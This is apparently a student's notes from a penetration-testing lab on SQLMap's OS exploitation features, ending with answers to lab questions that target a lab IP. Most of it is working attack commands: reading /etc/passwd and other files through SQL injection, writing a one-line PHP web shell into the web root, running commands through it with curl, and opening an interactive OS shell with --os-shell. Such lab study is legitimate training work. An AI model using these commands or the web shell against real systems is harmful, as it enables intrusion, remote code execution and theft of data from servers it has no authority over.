🎡OS Exploitation

SQLMap can attempt to give us direct command execution on the remote host if we had the proper privileges

We must have the following privileges: LOAD DATA and INSERT, to be able to load the content of a file to a table and then reading that table.

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;

DBA Privileges

To check whether we have DBA privileges with SQLMap, we can use the --is-dba

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

If we have current user is DBA: True we may have the privilege to read local files.

Reading Local Files

--file-read

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

It will generate an output file that we can cat later on

Writing Local Files

This is very restricted in modern DMBSes, since we can utilize this to write a Web Shell on the remote server,

To write files to the remote server we can use --file-write and --file-dest options

echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

we can use the --os-shell option

sqlmap -u "http://www.example.com/?id=1" --os-shell

If this fails we can try another injection like the Error-based SQL Injection, which we can specify with --technique=E

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Try to use SQLMap to read the file "/var/www/html/flag.txt".

sqlmap http://94.237.59.63:39959/?id=1 --file-read "/var/www/html/flag.txt" --dump --batch

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

sqlmap http://94.237.59.63:39959/?id=1 --os-shell